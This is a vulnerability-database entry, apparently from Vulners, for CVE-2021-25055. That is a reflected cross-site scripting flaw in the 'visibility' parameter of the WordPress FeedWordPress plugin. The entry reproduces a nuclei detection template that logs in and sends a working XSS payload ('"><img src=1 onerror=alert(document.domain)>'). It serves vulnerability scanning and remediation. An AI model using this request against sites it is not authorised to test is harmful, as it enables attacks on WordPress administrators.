Lucene search
K

WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

WordPress FeedWordPress plugin < 2022.0123 - Authenticated XS

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-25055
27 Apr 202309:58
circl
CNNVD
WordPress plugin FeedWordPress 跨站脚本漏洞
21 Feb 202200:00
cnnvd
CNVD
WordPress plugin FeedWordPress cross-site scripting vulnerability
23 Feb 202200:00
cnvd
CVE
CVE-2021-25055
21 Feb 202210:45
cve
Cvelist
CVE-2021-25055 FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
21 Feb 202210:45
cvelist
EUVD
EUVD-2021-11967
7 Oct 202500:30
euvd
NVD
CVE-2021-25055
21 Feb 202211:15
nvd
OSV
CVE-2021-25055
21 Feb 202211:15
osv
Patchstack
WordPress FeedWordPress plugin <= 2021.0713 - Reflected Cross-Site Scripting (XSS) vulnerability
18 Jan 202200:00
patchstack
Prion
Cross site scripting
21 Feb 202211:15
prion
Rows per page
id: CVE-2021-25055

info:
  name: WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.
  remediation: |
    Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055
    - https://plugins.trac.wordpress.org/changeset/2662665
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25055
    cwe-id: CWE-79
    epss-score: 0.02342
    epss-percentile: 0.81583
    cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: feedwordpress_project
    product: feedwordpress
    framework: wordpress
  tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=1 onerror=alert(document.domain)>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402206d153d5baebb6d9062aa0665329ecbd694fd4cadf49b31bfeb0b3a7be11714ca02205ea35076f375b89b65d5e66c70fe9d832bcc25781f461a2f084154853a119683:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.02342
29